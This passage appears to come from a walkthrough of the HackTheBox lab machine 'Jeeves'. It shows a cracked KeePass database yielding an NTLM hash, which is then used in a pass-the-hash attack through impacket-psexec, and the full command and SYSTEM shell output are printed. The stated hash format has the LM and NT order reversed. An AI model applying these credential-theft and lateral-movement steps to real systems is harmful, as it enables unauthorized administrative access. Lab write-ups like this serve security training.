CLEARTEXT Credential
After acquiring initial access to the target system with the kohsuke user, a KeePass database file was discovered. Although the database file is appropriately encrypted, the use of a weak password facilitated the straightforward cracking of the hashstring, ultimately resulting in the compromise of the KeePass database.
A total of 8 entries are present
Backup stuff
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
One of them caught my eyes as it contains what appears to be a NTLM hash, judging by the format; <NTHASH>:<LMHASH>
Given the entry is entitled Backup stuff, this just might belong to the administrator user
Pass The Hash
┌──(kali㉿kali)-[~/archive/htb/labs/jeeves]
└─$ impacket-psexec administrator:@$IP -no-pass -hashes
'aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00'
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.10.63.....
[*] Found writable share ADMIN$
[*] Uploading file iBnyQdZh.exe
[*] Opening SVCManager on 10.10.10.63.....
[*] Creating service XArU on 10.10.10.63.....
[*] Starting service XArU.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
c:\Windows\system32> whoami
nt authority\system
c:\Windows\system32> hostname
Jeeves
c:\Windows\system32> ipconfig
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . :
ipv4 address. . . . . . . . . . . : 10.10.10.63
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : 10.10.10.2
tunnel adapter isatap.{4079b648-26d5-4a56-9108-2a55ec5ce6ca}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . : System Level Compromise
The theory was correct. It belongs to the administrator user